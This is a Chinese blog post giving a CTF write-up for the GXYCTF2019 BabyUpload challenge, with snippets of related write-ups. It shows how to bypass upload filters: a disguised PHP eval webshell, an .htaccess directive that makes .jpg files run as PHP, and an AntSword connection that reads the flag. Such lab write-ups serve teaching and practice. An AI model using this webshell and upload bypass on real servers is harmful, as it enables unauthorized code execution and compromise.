[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)

最新推荐文章于 2024-04-18 11:59:40 发布
最新推荐文章于 2024-04-18 11:59:40 发布
阅读量852 收藏 2
点赞数 1
文章标签: web安全 安全 ctf 文件上传 waf绕过 htaccess
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133758646
版权
本文详细记录了解决GXYCTF2019挑战BabyUpload的过程,涉及文件上传限制的绕过策略,包括后缀名、文件类型及内容的检查。通过修改文件标识和利用.htaccess配置,成功将PHP文件伪装成JPEG并执行,最终使用蚁剑连接到服务器获取到flag。
摘要由CSDN通过智能技术生成

[GXYCTF2019]BabyUpload

1

解题流程

1、上传一句话,提示“后缀不允许ph”
2、修改后缀为jpg,提示“上传类型也太露骨了吧!”
3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊”
4、修改一句话的标识为:<script language="php"> @eval($_POST["pwd"]);</script>
  提示:/var/www/html/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg succesfully uploaded!
5、上传.htaccess:AddType application/x-httpd-php .jpg
6、蚁剑连接,根目录找到flag即可
  url:http://2a2a1e20-d142-49f2-800e-447c5f1717be.node4.buuoj.cn:81/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg
  密码:pwd

Hillain
关注
专栏目录
订阅专栏
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 2004
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 795
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
练习 5 Web [GXYCTF2019]BabyUpload
离暑假还有41天的博客
03-06 695
提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。重置靶机,修改木马文件后缀为png尝试(同样必须改Context-Type:image/png 为 image/jpeg)逻辑上先传一个.htaccess文件(指定jpg格式被解析为php代码执行)上去,试试会不会被过滤。重新开始,上传.htaccess文件,必须要修改Content-Type: 为image/jpeg。如果成功,再传一个修改为php后缀的木马文件,尝试通过木马控制。
CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 1053
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabyUpload
m0_63253040的博客
06-11 294
123123123123
[MRCTF2020]你传你呢
Sk1y的博客
03-02 2898
[MRCTF2020]你传你????呢 目录 [MRCTF2020]你传你????呢 上传.htaccess 上传1.png 蚁剑连接 题目:buu平台 解题过程: 需要上传两个文件 .htaccess是什么 原文传送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [GXYCTF2024]BabyUpload
最新发布
HUAXIAL的博客
04-18 283
如果你已经下定决心要转行做编程行业,在最开始的时候就要对自己的学习有一个基本的规划,还要对这个行业的技术需求有一个基本的了解。有一个已就业为目的的学习目标,然后为之努力,坚持到底。如果你有幸看到这篇文章,希望对你有所帮助,祝你转行成功。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注前端)一个人可以走的很快,但一群人才能走的更远!
【学习笔记 41】 buu [GXYCTF2019]BabyUpload
weixin_43553654的博客
08-02 558
0x00 知识点 .htaccess文件上传绕过 0x01 知识点详解 请参考我上一篇学习笔记 0x02 解题思路 一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件 <FilesMatch "flag.png"> SetHandler application/x-httpd-php </FilesMatch> 这里注意,这道题不知道为什么,我这
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 SQL 代码来执行未授权的操作,如获取敏感信息,篡改数据等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值